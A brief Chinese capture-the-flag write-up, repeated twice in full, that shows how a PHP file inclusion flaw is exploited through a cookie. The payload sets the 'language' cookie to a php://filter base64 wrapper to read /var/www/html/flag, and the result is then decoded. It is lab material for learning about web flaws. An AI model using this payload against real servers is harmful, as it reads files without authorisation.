先看看源码,大致了解一下。
猜测使用cookies传参。
也就是lan等于flag就可以啦。
接着。用burpsuit抓个包看看。
payload的构造如下:
Cookie: language=php://filter/read=convert.base64-encode/resource=/var/www/html/flag
最后解码:
结束。
先看看源码,大致了解一下。
猜测使用cookies传参。
也就是lan等于flag就可以啦。
接着。用burpsuit抓个包看看。
payload的构造如下:
Cookie: language=php://filter/read=convert.base64-encode/resource=/var/www/html/flag
最后解码:
结束。